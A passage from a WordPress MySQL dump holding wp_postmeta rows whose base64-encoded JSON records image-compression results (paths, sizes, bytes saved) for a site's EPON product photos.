cGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0NjYsInRpbWUiOjE0ODM1NTIzNTAsImlkIjoxOTAwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwN0YtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTAyLCJ0aW1lIjoxNDgzNTUyMzUzLCJpZCI6MTkwMH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwN0YtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEyNDQsInRpbWUiOjE0ODM1NTIzNTcsImlkIjoxOTAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwN0YtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2NTgsInRpbWUiOjE0ODM1NTIzNjAsImlkIjoxOTAwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA3Ri00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwN0YtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDdGLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo3MjUsInRpbWUiOjE0ODM1NTIzNjMsImlkIjoxOTAwfV0='); 
INSERT INTO `wp_postmeta` VALUES (29032, 1899, 'wpfc_optimisation_reduction', '15270'); 
INSERT INTO `wp_postmeta` VALUES (29033, 1899, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwNEYuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MjM2OCwiaWQiOiIxODk5In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwNEYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY5NCwidGltZSI6MTQ4MzU1MjM3MSwiaWQiOjE4OTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwNEYtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNzU5LCJ0aW1lIjoxNDgzNTUyMzc1LCJpZCI6MTg5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwNEYtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE2OTksInRpbWUiOjE0ODM1NTIzNzksImlkIjoxODk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwNEYtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo2ODgzLCJ0aW1lIjoxNDgzNTUyMzg0LCJpZCI6MTg5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwNEYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjU1NCwidGltZSI6MTQ4MzU1MjM4NywiaWQiOjE4OTl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwNEYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0ODgsInRpbWUiOjE0ODM1NTIzOTAsImlkIjoxODk5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwNEYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTA3LCJ0aW1lIjoxNDgzNTUyMzkzLCJpZCI6MTg5OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwNEYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEyNjgsInRpbWUiOjE0ODM1NTIzOTcsImlkIjoxODk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwNEYtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo3MjYsInRpbWUiOjE0ODM1NTI0MDEsImlkIjoxODk5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDA0Ri00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwNEYtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDRGLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo2OTIsInRpbWUiOjE0ODM1NTI0MDUsImlkIjoxODk5fV0='); 
INSERT INTO `wp_postmeta` VALUES (29034, 1898, 'wpfc_optimisation_reduction', '13665'); 
INSERT INTO `wp_postmeta` VALUES (29035, 1898, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwMkYuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU1MjQwOSwiaWQiOiIxODk4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwMkYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjY5OCwidGltZSI6MTQ4MzU1MjQxMywiaWQiOjE4OTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwMkYtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxNjU5LCJ0aW1lIjoxNDgzNTUyNDE3LCJpZCI6MTg5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwMkYtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0OTIsInRpbWUiOjE0ODM1NTI0MjAsImlkIjoxODk4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwMkYtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjo1ODE5LCJ0aW1lIjoxNDgzNTUyNDI1LCJpZCI6MTg5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwMkYtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjUzOSwidGltZSI6MTQ4MzU1MjQyOSwiaWQiOjE4OTh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwMkYtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0OTksInRpbWUiOjE0ODM1NTI0MzIsImlkIjoxODk4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwMkYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NTA1LCJ0aW1lIjoxNDgzNTUyNDM1LCJpZCI6MTg5OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL0VQT04tMTAwMkYtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjExNTksInRpbWUiOjE0ODM1NTI0MzksImlkIjoxODk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi0yMjV4MzYwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwMkYtMjI1eDM2MC5qcGciLCJ3aWR0aCI6IjIyNSIsImhlaWdodCI6IjM2MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2NTYsInRpbWUiOjE0ODM1NTI0NDMsImlkIjoxODk4fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi0xMDAyRi00NTB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tMTAwMkYtNDUweDMwMC5qcGciLCJ3aWR0aCI6IjQ1MCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTEwMDJGLTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MzksInRpbWUiOjE0ODM1NTI0NDYsImlkIjoxODk4fV0='); 
INSERT INTO `wp_postmeta` VALUES (29036, 1897, 'wpfc_optimisation_reduction', '17047'); 
INSERT INTO `wp_postmeta` VALUES (29037, 1897, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NzIuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9FUE9OLTg3Mi5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTUyNDUxLCJpZCI6IjE4OTcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL0VQT04tODcyLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvRVBPTi04NzItMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9FUE9OLTg3Mi0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzE4LCJ0aW1lIjoxNDgzNTUyNDU0LC